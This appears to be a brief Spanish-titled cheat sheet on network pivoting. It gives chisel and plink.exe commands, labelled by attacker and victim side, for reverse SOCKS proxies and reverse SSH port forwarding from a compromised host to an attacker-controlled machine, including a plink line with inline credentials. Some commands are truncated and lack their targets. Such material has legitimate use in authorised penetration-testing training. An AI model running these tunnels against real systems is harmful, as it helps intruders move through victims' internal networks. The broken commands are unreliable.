Técnicas de Pivoting





You can download it from the releases page of https://github.com/jpillora/chisel You need to use the same version for client and server


./chisel server -p 8080 –reverse #Server — Attacker

./chisel-x64.exe client R:socks #Client — Victim

#And now you can use proxychains with port 1080 (default)

./chisel server -v -p 8080 –socks5 #Server — Victim (needs to have port 8080 exposed)

./chisel client -v socks #Attacker

Port forwarding

./chisel_1.7.6_linux_amd64 server -p 12312 –reverse #Server — Attacker

./chisel_1.7.6_linux_amd64 client R:4505: #Client — Victim


It’s like a console PuTTY version ( the options are very similar to an ssh client).

As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine:

echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>

echo y | plink.exe -l root -pw password [-p 2222] -R 9090: #Local port 9090 to out port 9090

Comments are closed.